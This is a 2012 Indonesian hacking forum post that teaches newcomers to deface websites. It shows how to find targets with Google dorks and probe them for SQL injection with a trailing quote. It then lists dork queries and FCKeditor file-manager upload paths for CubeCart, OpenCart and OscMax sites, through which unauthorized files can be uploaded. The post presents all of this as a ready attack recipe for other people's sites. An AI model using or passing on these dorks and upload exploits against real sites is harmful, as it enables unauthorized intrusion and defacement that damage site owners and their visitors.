--==7art-hack==--
admin7art2
Jumlah posting: 25
Join date: 25.04.11
Age: 18
 |  Subyek: DAFACE WEB FOR NEWBIE  Sun Feb 19, 2012 1:10 am | |
| OKE agan-agan lang mulai aja ya,,,,,, menggunakan om google dorkscript dork SQL injection agar mengetahui webtarget bisa di deface atau tidak sisipkan tanda petik seperti ini ' pada akhir url tersebut. contoh : [You must be registered and logged in to see this link.]nah tuh tinggal tambahin tanda petik satu di belakangnya mas bro seperti ini jadinya nih. [You must be registered and logged in to see this link.]Nah bila nanti muncul tulisan dibawah ini Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname. Atau Sebagainya yang mirip Berarti Website tersebut bisa kita Deface. trus tinggal masukin script dibawah ini aja | Code: |
Exploit:
/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
|
turs pilih jenis file apa yang mau di upload.
dibawah ini adalah beberapa script sama dengan yang diatas. silahkan gunakan salah satunya.
1. Powered CubeCart
Adalah module Deface Upload file, kita bisa menggunakan cara ini.
Dork : Powered By CubeCart V 3.0
Exploit : /admin/includes/rte/editor/filemanager/browser/default/connectors/test.html
Contoh: [You must be registered and logged in to see this link.]
2. Powered By OpenCart
Dork : Powered By OpenCart
Exploit: admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Contoh : [You must be registered and logged in to see this link.]
3. Powered By OscMax V 2.0
Dork : Powered By OscMax V 2.0
Exploit : FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh ;[You must be registered and logged in to see this link.]
4. Hacking TXt.
Hacking Txt ini sama saja dengan Konsep 3 di atas it, cuma bedany khusus fiile txt saja yg bisa di upload, bentuk file lain tdk akan mnerima
Dork : Inurl:/FCKeditor/editor/filemanager/
Exploit : /FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh: [You must be registered and logged in to see this link.]
skian dulu ya,,,
klo gk paham silahkan ditanyakan aja ,,,, |
|
